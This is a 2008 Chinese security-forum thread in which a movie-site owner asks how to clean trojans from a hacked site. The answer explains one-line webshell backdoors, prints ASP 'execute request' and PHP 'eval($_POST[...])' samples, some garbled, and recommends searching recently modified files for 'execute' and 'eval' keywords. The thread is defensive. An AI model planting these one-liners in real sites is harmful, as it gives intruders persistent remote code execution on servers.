Board logo

标题: [分享] 网站被人挂马后如何彻底清除木马 [打印本页]

作者: 柔肠寸断    时间: 2008-12-23 12:21     标题: 网站被人挂马后如何彻底清除木马

网站被人挂马后如何彻底清除木马
首先自我介绍一下。我是一家电影网站的运营者
  昨天上网时一个朋友告诉我说。你的网站怎么全是百度LOGO的图片。接着发远程给我一看。果然全是百度LOGO的图片。满屏都是。我意识到是被人挂马了。于是赶紧用备份文件替换。结果替换文件也被人挂了马。我于分析我的源代码。终于找出在ADMIN/下找出一个diy.asp的小马。但是无论如何我再也找不出来了。
  希望各位高手能赐教
  如何才能彻底清除网站中的木马
  提问者: 邹贝贝 - 初学弟子 一级 最佳答案
  教你个检查asp和php的一句话后门.
  一般入侵者在得到一个网站的webshell后,为了以后再能进来,一般会在网页中插入一句话木马,方便以后进来,一句话木马隐蔽性非常强,在这么多文件中,我们根本不知道插在哪个文件里面,如果一个一个找,一个一个搜,是不太可能的.所以我教你个找的方法.
  asp的一句话后门:
  "〈%execute request("l")%〉"
  PHP的一句话后门:
  第一种:
  EOT;
  eval($a);
  print <<<EOT
  第二钟:
  2.
  a′]=′aa′;eval($_POST[′a′]);//
  第三种:
  3.
  a′;eval($_POST[′a′]);//
  运用的检查方法和检测asp或php木马一样,先在搜索指定日期被修改的或创建的文件,然后一个一个文件内容里搜索以下关键字:
  asp一句话木马: 搜索关键字:〈%execute
  PHP一句话木马:搜索关键字:eval
  一般通过上面的方法很快就查出一句话后门搜在哪个页面里面,揪出来K掉就行了.
作者: fjste    时间: 2008-12-23 15:17

支持一下啊




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2